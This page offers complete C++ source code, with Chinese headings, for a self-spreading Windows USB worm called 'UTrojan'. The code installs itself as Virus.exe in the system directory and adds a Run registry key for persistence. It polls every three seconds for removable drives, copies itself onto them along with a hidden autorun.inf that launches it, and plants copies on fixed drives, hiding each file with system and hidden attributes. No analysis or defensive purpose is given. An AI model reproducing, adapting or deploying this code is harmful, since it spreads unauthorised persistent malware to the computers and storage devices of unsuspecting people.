C++ U盘感染程序源码
print?#include "stdafx.h" #include <stdio .h> #include <windows .h> HANDLE hMutex;//信号量句柄 DWORD WINAPI infect(LPVOID lpParam);//感染 void Install(void); //安装 void InfectOtherDisk();//感染其它盘 char ExeFile[MAX_PATH]; //========================================================================== void Install(void) { char FilePath[255]={0}; char Explorer[12]="explorer "; HKEY AutoStart; STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory( &si, sizeof(si) ); si.cb = sizeof(si); ZeroMemory( &pi, sizeof(pi) ); if(GetSystemDirectory(FilePath,254) == 0) { return; } strcat(FilePath, "\\Virus.exe"); CopyFile(ExeFile, FilePath, true); RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &AutoStart); RegSetValueEx(AutoStart, // subkey handle "UTrojan", // value name 0, // must be zero REG_SZ, // value type (LPBYTE) FilePath, // pointer to value data strlen(FilePath) + 1); // length of value data RegCloseKey(AutoStart); strcpy(FilePath,ExeFile); //now use FilePath[] as temp FilePath[3]='\0'; strcat(Explorer,FilePath); CreateProcess( NULL, //open the directory of U-stick as usual Explorer, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi ); return; } //========================================================================== DWORD WINAPI infect(LPVOID lpParam) { char Drives[255]; int DriveType; char *pDrive=0; char FilePath[25]; FILE *AutoRun; while(true) { memset(Drives,0,255); memset(FilePath,0,25); pDrive=Drives; DriveType=0; AutoRun=NULL; GetLogicalDriveStrings(254,Drives); while(pDrive[0]!=NULL) { DriveType=GetDriveType(pDrive); if(DriveType!=DRIVE_REMOVABLE) { pDrive+=4; continue; } strcpy(FilePath,pDrive); strcat(FilePath,"Virus.exe"); SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL); DeleteFile(FilePath); CopyFile(ExeFile, FilePath,false); SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM); strcpy(FilePath,pDrive); strcat(FilePath,"autorun.inf"); SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL); DeleteFile(FilePath); AutoRun=fopen(FilePath,"w+"); if(AutoRun!=NULL) { fputs("[AutoRun]\n",AutoRun); fputs("open=Virus.exe\n",AutoRun); fputs("shellexecute=Virus.exe\n",AutoRun); fputs("shell\\Auto\\command=Virus.exe",AutoRun); } fclose(AutoRun); SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM); pDrive+=4; } Sleep(3000); //every 3sec to detect whether a U-stick exits } return 0; } //========================================================================== void InfectOtherDisk(void) { char Drives[255]; int DriveType; char *pDrive=0; char AppFilePath[25]; char InfFilePath[25]; memset(Drives,0,255); memset(AppFilePath,0,25); memset(InfFilePath,0,25); pDrive=Drives; DriveType=0; GetLogicalDriveStrings(254,Drives); while(pDrive[0]!=NULL) { DriveType=GetDriveType(pDrive); if(DriveType==DRIVE_FIXED) { strcpy(AppFilePath,pDrive); strcpy(InfFilePath,pDrive); strcat(AppFilePath,"Virus.exe"); strcat(InfFilePath,"autorun.inf"); CopyFile(ExeFile,AppFilePath, true); SetFileAttributes(AppFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM); CopyFile("autorun.inf",InfFilePath,true); SetFileAttributes(InfFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM); pDrive+=4; } else { break; } } } //========================================================================== int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { // TOD Place code here. int DriveType; GetModuleFileName(NULL,ExeFile,MAX_PATH);//得到此程序的路径 if((hMutex=CreateMutex(NULL,true,"UTrojan"))==NULL) { return 0; } DriveType=GetDriveType(NULL); if(DriveType==DRIVE_REMOVABLE) { Install(); InfectOtherDisk(); ReleaseMutex(hMutex); return 0; } else if (DriveType==DRIVE_FIXED) { InfectOtherDisk(); CreateThread(NULL,NULL,infect,NULL,NULL,NULL); return 0; } else { return 0; } } </windows></stdio>